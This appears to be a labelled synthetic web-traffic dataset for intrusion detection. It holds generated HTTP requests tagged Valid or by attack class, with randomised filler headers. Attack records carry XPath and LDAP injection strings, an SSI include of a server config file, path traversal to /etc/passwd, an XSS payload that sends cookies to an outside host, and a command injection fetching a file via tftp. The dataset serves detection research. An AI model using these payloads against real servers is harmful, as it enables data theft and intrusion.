UA-Disp: 743,400,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4129x627
Via: 3.0 209.212.147.126, 5.7 www.aflz.css
Transfer-Encoding: compress
Upgrade: neaxe/1.5
Warning: 524 www.ihrn.jpeg "0rnvrpiinz" "Wed, 08 Apr 09 02:51:11 UTC"
X-Forwarded-For: 186.72.20.98
X-Serial-Number: 8671982338196
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20915
Start - Id: 49001
class: XPathInjection
GET /jMm05tnqbPhh/XDz/Ta2esxrsaoeteyAoo/Pq/8cgyEV@/e5/ev0P3Cuy0@OQ2i8.U/.zF/jj7v.I5F/wpRi.UhZBrD4nSn@/0O/oNaaEtzce.mspx?uNvh4tarpvgmyol=6&aI0iAr2yrah=ncss%2Fap%2Fh%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D9%5D+++%7C++tb%2Fykf%2F8nn2%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D+++or+++++%27nhyyq4k%27+++%3D++%27&8CCO6ftmpQq=yagv HTTP/1.0
Host: 111.210.8.190:0
Connection: w7nsooi
Accept: image/png, text/*;q=0.7, image/*;q=0.0
Accept-Charset: x-mac-arabic;q=0.9, windows-1257;q=0.0
Accept-Encoding: gzip;q=0.3
Accept-Language: sinet-E, oEtfs-p
Cache-Control: max-stale=97783
Client-ip: 104.121.111.149
Cookie: tn=ee;eodlco=dogGsOqv
Cookie2: $Version="6"
Date: Wed, 02 Mar 05 18:28:55 GMT
ETag: W/"_rZhm0NzLc2Mi18y-yg"
Expect: 100-continue
From: yriAeeon@iwtteeent.st
If-Modified-Since: Sat, 11 Aug 07 17:48:17 GMT
If-Unmodified-Since: Mon, 03 Oct 05 11:05:49 CET
If-Match: *
If-None-Match: "D2Wh7_IIA9k5CkVBDhw5"
If-Range: "Nkl_1cQDSzNpyd8aNW"
Max-Forwards: 52
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nc=2FF0fE2f
Authorization: Basic aW5vZWk6aXR5ZWxpdA==
Range: -520,420265-,87-062067
Referer: /ttrkscnn.aspx
TE: deflate,chunked
Trailer: Range
User-Agent: atttee
UA-CPU: 68000
UA-Disp: 638,801,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 146x384
Via: 2.4 197.55.30.48
Transfer-Encoding: gzip
Upgrade: aciIr/5.8, i4yc/6.1, 4tur/3.8
Warning: 893 www.orci.jpg "9g1en4itrrimothb4" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49001
Start - Id: 39575
class: SSI
PUT /rX1.xU-hqePdK5r/36Yt/o6oogRQdAnaPJ2q/ywiarvtiel/ts83HuHXJ0ytnEN/h3.tiff? HTTP/1.1
Content-Length: 133
Content-Language: itosohzm,lter
Content-Encoding: deflate
Content-Location: /bat6/Shitwlo6/d20Hph.jpg
Content-MD5: b2FzZ2RhcmVDODRmZXNsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Aug 07 20:04:36 GMT
Last-Modified: Sat, 10 Oct 09 10:32:14 CET
Host: 0.44.62.176
Connection: rnnr
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.9, compress;q=0.9, deflate, gzip, gzip;q=0.0
Accept-Language: *;q=0.1
Cache-Control: min-fresh=4
Client-ip: 145.102.168.110
Cookie: ttullmimam=5X57XTqq;itrtcthm=14
Date: Sat, 21 Apr 07 05:47:06 GMT
ETag: "E-DjyT8l5_1VDtzNt-o"
Expect: chkksn
If-Unmodified-Since: Tue, 29 Mar 05 16:38:12 GMT
If-Match: "60iTwuKyZWjIevA"
If-None-Match: *
Max-Forwards: 6500
Pragma: d='eusaloe8'
Referer: /whlnscz/x16i/ltE8.mdb
TE: trailers,trailers
User-Agent: Mozilla/8.7 (Windows; U; Win98 0.4; id-hi; rv:9.1.5) Gecko/97806981
UA-CPU: x86
Via: 1.4 147.201.129.5, 6.7 42.203.74.130, FTP/6.8 www.coGgsodh.htm
Transfer-Encoding: compress
----: -------------------------------------------------

de6e2uIopemuiT=poh&ibebesbllrf0=<!--#include   virtual="/etc/httpd/httpd.conf"     -->&ayl=nic2K&sgteeiia=9728090

End - Id: 39575
Start - Id: 46245
class: PathTransversal
GET /AhnprcDaxtfdnNos/jN0de5ooa/3zKZ9iXqn/tuRaGLwrIkxyD/Mor/gWEOH/o3GN50Hx3_obyRDN/likeMexecziw.SeunionGt.swf?8rey0toexlaey=mIttAstnyml&uruHszte=k+ftpi8o&iJoKr=ftnicat0openrma%3Dap&COSNtlhaaphe=309835&mw5uRmrp=aOb&jeaeaheshr=ke%265ia%3B5aeTeae&wk9AczLioeoOo=lrIGcp2P&rrm=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&n0nsi5lhls8mtb=4356070&daattitimhrHIt=CsR4re8rs0l&ieD0l=ucopy HTTP/1.1
Host: www.ap4ansl.ch:6
Connection: d4zis8
Accept: */*
Accept-Charset: x-mac-greek;q=0.0, euc-tw;q=0.4
Accept-Encoding: gzip, compress, gzip
Accept-Language: bjRaikwl-6mmp;q=0.3, ltYErca-Tttaa;q=0.3, nsasfke-eeoti;q=0.4, en3-nObrut;q=0.6, t-lcptneD
Cache-Control: max-stale=552
Client-ip: 231.150.7.86
Cookie: gnewsaljo8hvp=dtstThN8jceNiz;Coile=0875961;iisiyu1o4Doal=e;8ne2=e|y3tobjectjphp at>hspe;yitO3ddeen8et3=d4e
Cookie2: $Version="79"
Date: Sun, 01 Feb 09 17:25:19 UTC
ETag: W/"4GaIFePkNWXt7fmQSf7"
Expect: 100-continue
From: e4ia@iiZbne.de
If-Modified-Since: Tue, 24 Nov 09 19:46:52 UTC
If-Unmodified-Since: Wed, 28 Apr 10 07:27:19 UTC
If-Match: *
If-None-Match: *
If-Range: "VA_J42qK6ZzOnXatb"
Max-Forwards: 3
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: NTLM bm92ZW9vc29lb3lyaWVMbnNiZW5saWVqdG5hMnFBbWVjNm50Y2U5Y2lpUnVoYXBy
Range: 5263-
Referer: /aoakkt/reagegae/9tyfmhq/colnaek.exe
TE: deflate;q=0.9,trailers
Trailer: If-None-Match
User-Agent: hjLf1E http://www.uooh.st
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: HTTP/6.2 184.179.137.239
Transfer-Encoding: deflate
Upgrade: tk5t/9.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 211.19.211.211
X-Serial-Number: 79986231728889
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46245
Start - Id: 47893
class: XSS
GET /tN1BORunPkdSSXTd6R/is2d8iwm/-formKyZDK/Fm0c/EejBuiL/san.htm?clpmullaey2ntia=0043381&amtby0otnedaH=ipt&e2twis=amo&etW=2284&yrzn9o=Olranlsczb&exyacaaroas=%3Cimg++++src++%3D++%22++++mocha%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.etto.com%2Fcgi-bin%2Fll.cgi%27%2Bdocument.cookie%29%3B%5D+%22++++%3E&o7wotaloq1atm=a%28nb+cod74wget%7EineTbaphp&tistlosAsg3lrto=isrei8htp&2uRqa8gtaaN=ts&wget4v-insert-h8=295334751&nmedsbdfeioep=8544948743 HTTP/1.1
Host: 16.213.221.146
Connection: close
Accept: image/gif
Accept-Charset: iso-8859-8-i;q=0.6, iso-2022-jp;q=0.9, ks_c_5601-1987, euc-cn, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=8
Client-ip: 2.6.142.235
Cookie: fibc3iey=28952;KbL0o1dyyd=219;6WtDjegbI=18
Cookie2: $Version="5"
Date: Fri, 24 Mar 06 08:02:53 UTC
ETag: W/"SCzBCfLRWAMxc14"
Expect: 100-continue
From: clrwp@noorqoy.ch
If-Modified-Since: Mon, 05 Nov 07 02:03:08 UTC
If-Unmodified-Since: Thu, 15 Nov 07 03:43:33 UTC
If-Match: *
If-None-Match: "7m7aqRh_dlwv47lr"
If-Range: "X_BqJYcW00mJ5D4lCoY"
Max-Forwards: 2306
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Basic OHRvZGE6RTZ0dA==
Range: -43,-33,199214-
Referer: /ho8o/essup/iorH.php3
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: If-Range
User-Agent: iduf (loS9gI; o-c9RqWf; d.nRGw2fPJ)
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 084x9415
Via: 1.8 246.164.138.81
Transfer-Encoding: oOtNne; ig9m=sooe
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 819 33.34.116.163 "Eun7wngOa" 
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 47893
Start - Id: 27240
class: Valid
GET /tc/t6Quqbc8oJ2E/aq6bZ9YYwG/db6VQhtgRLHa2d0/BcdQy/Fx/ejcEid3eavslo1ep3hto/Sts/LqsrloT7gpfiA/9iOVTrtLfa.pl?aoaiahms=oee&helEtrb=nOb9&gsgebS3j=493447&7Gb7hrl.logVT=zBIS9fY4UZc&6veesdxduMosoi=fik&cibte=stsCsx&crThnh6si5=eo5VBRrHEZ&stieulfka8nulew=yiieuscmd+epat&t2gaeOuyaautehh=445580&rclansawgeii=arlattOhvya HTTP/1.0
Host: www.tihaihh1a.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr;q=0.0, iso-8859-3, windows-1258;q=0.5
Accept-Encoding: *
Accept-Language: tlhleI-e;q=0.5, Ec5-di, ati-I6gg
Cache-Control: max-age=935
Client-ip: 31.82.103.206
Cookie: elwcLgPSGQc=786
Cookie2: $Version="2"
Date: Fri, 12 May 06 20:45:52 GMT
ETag: W/"IAoA@6wpr_VJhLW8vaOA"
Expect: use7=hoPte
From: rted@eseO4iri7.net
If-Modified-Since: Mon, 07 May 07 24:59:11 UTC
If-Unmodified-Since: Fri, 28 Jul 06 06:19:17 GMT
If-Match: "pPim4JRiwp9KaCzB04wt"
If-None-Match: *
If-Range: Tue, 02 Nov 04 12:31:32 UTC
Max-Forwards: 41
MIME-Version: 6.0
Pragma: ricwa8rn=mE
Proxy-Authorization: NTLM YXBzZmxob2xJYWVhc3lsb3NzbHNzcmNvc25tZW55b2hvemV1aGVCNnRw
Authorization: Iop5 iehr=aaioi
Range: 6031-0
Referer: http://edaatk1.it/j7AetR/ou8e.php4
TE: deflate
Trailer: If-Match
User-Agent: prer8n/5.5.2.1.2
UA-CPU: 68000
UA-Disp: 4043,642,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0575x9331
Via: 9.1 www.jnablEhZ.html
Transfer-Encoding: compress
Upgrade: nnr3no/2.4, ssa6/6.6, nrmmhe/0.5, dTflr/9.1
Warning: 912 www.tlsceet.jpg "htt0txe6ditepgelehe" 
X-Forwarded-For: 59.58.186.111
X-Serial-Number: 907247306873
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27240
Start - Id: 16304
class: Valid
GET /9_v0/K4lsrus/sy/JF8LN82ygU/nieoubs/4aee0qagokIosste.shtml? HTTP/1.0
Host: 232.99.55.147:97
Connection: ig9uzGte
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 49.102.20.12
Cookie: er=av1tsyutmpvon) 1i1et;zieaojT=446509;inmorigcBl=tgCTktkdrR;Ldsr=nein;rg=ps
Cookie2: $Version="13"
Date: Fri, 13 Feb 09 17:55:10 GMT
ETag: "9JaVGtP0jv4zLr6t"
Expect: 100-continue
From: rgzsla@yEtrran.fr
If-Modified-Since: Mon, 20 Oct 08 08:37:21 CET
If-Unmodified-Since: Mon, 07 Jan 08 23:09:48 CET
If-Match: *
If-None-Match: "u4wbMN0AEf2Ux3FUx"
If-Range: Fri, 10 Dec 04 09:56:06 GMT
Max-Forwards: 6
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic eXR1aDJyNDpvaXR0
Authorization: Digest nonce
Range: -652120,9-,091-
Referer: /etkn.tiff
TE: chunked;q=0.0,deflate
Trailer: Accept-Encoding
User-Agent: shidououoolhtc3tx
UA-CPU: 68000
UA-Disp: 6300,4567,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8017x209
Via: HTTP/7.7 www.ykno.shtml, 0.0 235.120.34.203
Transfer-Encoding: identity
Upgrade: znuO/5.9, rnoe23/2.5, sutmh/9.2, Paxtie/5.0, dcrIu3/2.7
Warning: 182 12.52.27.239 "ktimagrdshOdqo" 
X-Forwarded-For: 126.236.238.240
X-Serial-Number: 39357482225884778580
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16304
Start - Id: 13612
class: Valid
GET /rSGzzVZyOE/6aKzzXuyuXrpm_/ysriodrrdI5wop0ewr.sh?cE2eceiz8at=nCqciVyRp&Qtstdina-KLautoexecHkE=b&gaes=651562356 HTTP/1.0
Host: 31.221.61.221
Connection: keep-alive
Accept: text/*;q=0.1, video/*;q=0.2, application/*
Accept-Charset: windows-1252, euc-cn;q=0.6, euc-kr, koi8-r;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: d2gi='gn0csslt'
Client-ip: 239.64.215.236
Cookie: ds=nezw6iey ;ryEMhikan=j9rrlovnaBhphpnr2
Cookie2: $Version="796"
Date: Thu, 17 Feb 05 24:34:35 GMT
ETag: "y_edEifPYWE54zi-v"
Expect: tooesns=Nhma9rr
From: hwaei@ybC13e6.ch
If-Modified-Since: Fri, 13 Feb 04 21:08:12 UTC
If-Unmodified-Since: Sun, 16 May 04 21:55:23 UTC
If-Match: "ugtVk1tmoD3VdcPiYox"
If-None-Match: *
If-Range: *
Max-Forwards: 998
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM bWVpNmFhc282ZGRzckh3bUl0dzhoNnJlaW83V2ZDb3RyU25z
Authorization: Basic REhhZXk6aHNyMWllcw==
Range: 8-93898,-3983,-5248
Referer: /isKZ7eey/sahmj.txt
TE: chunked;q=0.2
Trailer: From
User-Agent: Mozilla/6.9 (X11; U; Unix 0.2; ol-sI; rv:2.4.5) Gecko/49037362
UA-CPU: PowerPC
UA-Disp: 5272,4338,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1926x6601
Via: HTTP/1.4 22.74.241.12
Transfer-Encoding: deflate
Upgrade: ksola/7.8, haEuhh/9.9, nrh/5.2, Dl0m/5.1
Warning: 667 193.214.100.224:730 "rhuswliziie6a" "Sat, 17 Apr 04 22:29:46 CET"
X-Forwarded-For: 48.26.121.103
X-Serial-Number: 5747927259472661
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13612
Start - Id: 30321
class: Valid
GET /uI/U@@J-@breplaceDzlibN.swf?rGnayvnpllaf=rrhe+0%5Dn9ltm+&KtDnuw7=azum+i3iwsRg3&e0sona1b=61805914&2tsdreopo=9348&p2r=8570&cgaa4iodw=6ZObIYHZiu&eCf=ihPteide%27scriptsucmd&moseadvruse=3&e4w=e%40%28n&opfrvrxgld=065&OuojtTjaiatd=iLy1Ihpw&Pk=no%27wmstdin&jwuesNall5dcryE=icq HTTP/1.0
Host: www.4We8lol.biz
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 5-cnd, eashior-C;q=0.6, sqpsgnee-dz, s-ae9wsz
Cache-Control: no-transform
Client-ip: 219.179.134.227
Cookie: d81eqatnA=swutGea0owd3pww;ublhv=cesfuti;t9adaa=54940915;1ltulrdi1a=7741356
Cookie2: $Version="1"
Date: Fri, 10 Jul 09 16:21:25 GMT
ETag: W/"uaTGlGF-qbMung2oH"
Expect: tgt4
From: eredri@rnloehihom.net
If-Modified-Since: Tue, 01 Feb 05 01:12:41 UTC
If-Unmodified-Since: Mon, 13 Feb 06 04:25:28 UTC
If-Match: "2TNoZ_VX93PUmncWFC"
If-None-Match: "e@MP@PGjPE5-ZsZAEO"
If-Range: Mon, 02 Jan 06 03:58:44 CET
Max-Forwards: 8
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZXJ0SWN5YjU6aFRuNHRu
Authorization: Digest qop=auth-int
Range: 3-440226,69-6
Referer: /pnsx5.html
TE: trailers
Trailer: Connection
User-Agent: Mozilla/8.5 (X11; U; SunOS sun4u 7.3; qo-4b; rv:3.7.8) Gecko/35719992
UA-CPU: 68000
UA-Disp: 2673,3726,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3971x442
Via: HTTP/7.3 27.231.7.167
Transfer-Encoding: netl
Upgrade: iure/4.9
Warning: 232 99.201.159.8 "oAqfnetTzahmyttdf" "Fri, 04 Jul 08 05:10:09 UTC"
X-Forwarded-For: 209.241.65.202
X-Serial-Number: 60742
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30321
Start - Id: 49906
class: XPathInjection
GET /gLi/sOtscript7Q/aibnanawocot/ent2sresmhc/WOqW7PoCTJuPDG/ouheeietoeg4et/oeryi1p/ee1guxlt/tleo4tsy/as2qp/zbhlg4eatssnea9odse.jpg?9h1Nc@T@JG=Oate7U%27+or+++6+++%3C+count%28path%2Fchild%3A%3A*%29++or++++%27ut3eiI%27+%3D++%27&hHoels=0626&d7ee=98909866 HTTP/1.0
Host: www.Noulri.ch:80
Connection: keep-alive
Accept: text/*;q=0.1, audio/*, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 46.208.216.230
Cookie: 9LtelnetdH=awnoehOs;_RPdb=an>ti);oecer=te%%o/laccepti7dsv;7oztri=altsee0wneRtr=8crw;Crgestte1edglj=c@S-wnTagit
Cookie2: $Version="7"
Date: Mon, 19 Apr 04 05:02:12 CET
ETag: "-PkzT_C75R64usx5m"
Expect: 4rzr
If-Modified-Since: Mon, 20 Jul 09 22:26:40 UTC
If-Unmodified-Since: Sat, 26 Jul 08 13:29:45 GMT
If-Match: "VgRM.hzWFWwvjV@43"
If-Range: Fri, 15 Jul 05 05:42:04 GMT
Max-Forwards: 6
Pragma: 63aee='nt'
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: ia3b sara=5iwwpoh5
Referer: http://www.scwlaegp.com/nfenr/oidfra1/udIh.php4
User-Agent: popobroecA1tCh3s
UA-Disp: 7061,246,32
Via: 3.1 173.146.101.38
Transfer-Encoding: compress
Upgrade: mbtii/3.9, teUb/8.8
X-Serial-Number: 70298520558
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49906
Start - Id: 33643
class: Valid
PUT /A5/5bHkleIS/ortrrt9sTkr6d/ikr5baUy/enadmnf5nh0cohoTaQit.asp? HTTP/1.0
Content-Length: 78
Content-Language: rk,yloid,ynei
Content-Encoding: identity
Content-Location: http://dRhnes.gov/justg/daPJroNe/ta8ssrr/nxti/etdaa.tar.gz
Content-MD5: SXRFdEVndHlPeUdmdGFBaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Nov 04 21:48:09 GMT
Last-Modified: Wed, 30 Mar 05 16:49:42 UTC
Host: www.mN7nTR.be:61121
Connection: close
Accept: audio/*, text/*, video/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: awefE1ac-qe;q=0.7, ansoa-hie, utnntn5-deFl;q=0.1
Cache-Control: min-fresh=0449
Client-ip: 143.123.191.1
Cookie: iti8aabIspus=k;ferrhyyu=esetduaebautoexecxp_+he
Cookie2: $Version="136"
Date: Wed, 07 Sep 05 14:09:55 UTC
ETag: "vvLw1PZsucRgJpckrD"
Expect: 100-continue
From: sncf@ebngie1ui.fr
If-Modified-Since: Fri, 27 Jun 08 15:36:31 GMT
If-Unmodified-Since: Tue, 31 May 05 19:01:12 CET
If-Match: "SktJIwreag-TW3Nl82H5"
If-None-Match: *
If-Range: Sun, 13 Dec 09 21:01:49 UTC
Max-Forwards: 4
MIME-Version: 8.9
Pragma: a=di
Proxy-Authorization: Basic c242bzp1aHNydHV5
Authorization: NTLM N2U1aW9ndEVjbTczcGVyZ3Nyc0FqOXdmd29kaGR3Ym1zbjB6cm44
Range: 585-81
Referer: http://BanAstt.fr/lMke/snen.asp
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: dlci (i6SyPo51g2)
UA-CPU: PowerPC
UA-Disp: 6340,3688,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3257x6651
Via: FTP/2.8 138.197.173.10, FTP/1.5 165.239.157.197:37907
Transfer-Encoding: compress
Upgrade: gtna/7.9, sn70/6.7
Warning: 498 www.xaotiar.jpg "eukeq6fnna" 
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 310133590231890475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

dnst=aCd0D&JRhavingMLoRNR0z=412994703&emxiiw1ne7r=9355305&shwt=55&h5uis5=nrssv

End - Id: 33643
Start - Id: 25878
class: Valid
GET /u0ofcIk9/g5bpHPz0BI-WBh/9cEOrpnk6m2d5aR/b6okUfd.S.jsp?ciyr1=oedoinetcatwtarukt&naEBcs=os&iUarajrrransjn=tEp-BBj&mhai3o=2 HTTP/1.0
Host: www.hluaahhie.st:80
Connection: keep-alive
Accept: image/*, application/*, image/gif;q=0.0
Accept-Charset: koi8;q=0.0, cp-950, euc-tw, x-mac-arabic;q=0.6
Accept-Encoding: deflate, deflate, compress;q=0.0, deflate, gzip;q=0.2
Accept-Language: *;q=0.2
Cache-Control: min-fresh=2
Client-ip: 208.224.54.200
Cookie: EpfataeatEo7=2;Dboot.iniQJV8z=uniontemchildete;nemiE54cio3wrxr=+h=lt;bclosteer=Oesbo
Cookie2: $Version="13"
Date: Fri, 30 Sep 05 22:25:40 GMT
ETag: W/"WXYJo1uz4.eSTjq"
Expect: 100-continue
From: be0oew@2lap0f3uX7.be
If-Modified-Since: Thu, 05 Oct 06 10:20:59 GMT
If-Unmodified-Since: Wed, 05 Dec 07 11:18:22 GMT
If-Match: *
If-None-Match: "wyI9buMb_JoFl-y.J"
If-Range: "inOcQokTpBZo8v.pw"
Max-Forwards: 2
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest nc=e52Ed6B1
Authorization: Digest qop=0OuwT40j
Range: 843-0717,4422-,58581-1046
Referer: http://o9pbha4.fr/Pntlrs/Ms2s/e7ronnP8/tnosc8/nzd8n.tiff
TE: gzip;q=0.3,gzip;q=0.8,gzip;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/2.3 (compatible; MSIE 7.4; Windows NT; aUiy)
UA-CPU: 68000
UA-Disp: 291,6267,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 027x334
Via: sD1r/4.7 208.149.11.140, etsz0a/5.2 86.79.123.83, ope/0.7 www.rxoieai.html:1
Transfer-Encoding: identity
Upgrade: fsrqfZ/4.4
Warning: 374 www.ogoia.htm "otcnJefpihsipdln" 
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1952797256
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25878
Start - Id: 37852
class: LdapInjection
GET /efJS9g2/ujmV_FQzE3q6Indh0Uu4/iQPBX_6.jpg?cmdsx.Yj@OMP=NJee&zz2t4Waelmmb=%3B2h3eneIjSaciframeeenne&ce=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&0bYphpYWk.RN=792 HTTP/1.1
Host: 40.64.189.94
Connection: nogEt5
Accept: audio/*;q=0.7, image/gif;q=0.7
Accept-Charset: shift_jis
Accept-Encoding: *
Accept-Language: zs7z-rcetys;q=0.3
Cache-Control: max-stale=1
Client-ip: 177.246.9.242
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="737"
Date: Wed, 23 Mar 05 13:22:48 CET
ETag: "5zNxKaSEcACZS8Il5w"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Thu, 25 Mar 04 18:39:44 GMT
If-Unmodified-Since: Mon, 11 Dec 06 17:31:08 CET
If-Match: *
If-None-Match: "TMovokovDB5iACx8bKIz"
If-Range: *
Max-Forwards: 60
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="olkoyp9"
Authorization: shsawf 9kNre=eHyvsun6
Range: 853418-,-430
Referer: http://www.n1onse.ch/yeiwwi/1e7l/dymah/o9ei/pnne.fgf
TE: trailers
Trailer: Referer
User-Agent: eih0ataih0krhr8h
UA-CPU: x86
UA-Disp: 780,4386,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2946x657
Via: 4.3 198.154.35.115, 8.2 67.23.2.79, 5.9 254.55.179.110
Transfer-Encoding: Th4t; 5ear=i8mtccy
Upgrade: uoE/5.1, iitjl/6.0
Warning: 287 103.81.155.36 "rn2cofne7rqdunmwn" "Tue, 01 May 07 12:17:09 UTC"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37852
Start - Id: 36069
class: PathTransversal
GET /nmeh1atKmtx/regSyndjsltIStpewetd/hSuvn3uH/4wL/Uae7SyNAoS/pr/KMO/e3oEfHpAogJG-ysO/_EbinJchildXuDinputaccess_logOFum2/eito0nao8TH4on.jpg?dertaaremNc=mES&i91p=u.h&mwttoc=dioHd&T8bint=divdo&syawfrompdExp_UX4=+dnodeo&mlukiosem=183498&et1eerixdal9=sbnNnmv&Q0-AmailZ=ndelete&PpIZvV-BOR7=099&iaswzA=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&l4H6Dnrli=%3Ey2dhxekztlH+iTM%2Fm HTTP/1.1
Host: 191.190.98.157
Connection: close
Accept: audio/*;q=0.8, text/html;q=0.8, image/png
Accept-Charset: x-mac-cyrillic, x-mac-japanese;q=0.9
Accept-Encoding: deflate, gzip;q=0.7, compress, compress, identity
Accept-Language: yTf-nrId, t-r6Trs
Cache-Control: no-cache
Client-ip: 45.198.125.138
Cookie: andX3E5Qu=tdot;nzmtmpf=547555686;aEfnEhn4=113;eeatal=mlyedshioHApt7regi
Cookie2: $Version="080"
Date: Thu, 16 Aug 07 17:48:29 UTC
ETag: W/"CHRBHIdtJ0gNNdG"
Expect: 7caedD
From: Esva@5c4oorIai.it
If-Modified-Since: Mon, 13 Oct 08 14:44:37 CET
If-Unmodified-Since: Mon, 25 Aug 08 11:40:42 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 05 May 07 01:36:31 UTC
Max-Forwards: 0
MIME-Version: 1.3
Pragma: VHK=soA
Proxy-Authorization: NTLM dW50b2ppZWE3em1vdEFuYWFVRW1jcmVjaGhkZWFzbmhpaWh0SXc=
Authorization: Basic Y3J0TmlhOmltbGxvYQ==
Range: -31,-3,49859-
Referer: http://www.dg6p0ma.biz/hbdaar/tn9t/ssmttO.php3
TE: deflate
Trailer: Warning
User-Agent: dTurhIidtoh
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 745x4826
Via: FTP/9.6 164.60.22.111:0, HTTP/8.3 150.2.224.144, 7.8 www.naxNc.htm:8073
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36069
Start - Id: 44603
class: OsCommanding
GET /ivI8KFOW22@M/emrshveabahbno/agb4S77.m_W-u/aPQ23wVf/aoaT4eyr/KVf/lqZq_vWSz3O/mcJNwMsWrI@5/1zOZ.HoXreplacef5TnM/cy8Ip9qp09qNsMQIHwv9/yqk2b/3ncesiaatateNr1pe.jpeg?n7ttjVbI08dri=fsyixaod8alep5qTf8&TMmohAb=ina2mhNs&etvwp8yaa=5&oL=411547&zL%uwxwc5J=varaccess_logodgm+eea&IH7oceeh=yo%24is&lia=tzseg&eoi=83&cyidtI=80&tn=35&idw=k+or&pUlikeq@w2binputnN=107.129.199.182+%7C+tftp+192.168.10.33+evil.txt&usevidiTNc=18224231&jwdcmftilsooqrr=medihin&onmaMc3e=mS9igpEi3Lehdmo HTTP/1.0
Host: www.s7oOns.biz
Connection: Ha3nh
Accept: audio/x-wav;q=0.4, text/html
Accept-Charset: *
Accept-Encoding: *;q=0.4
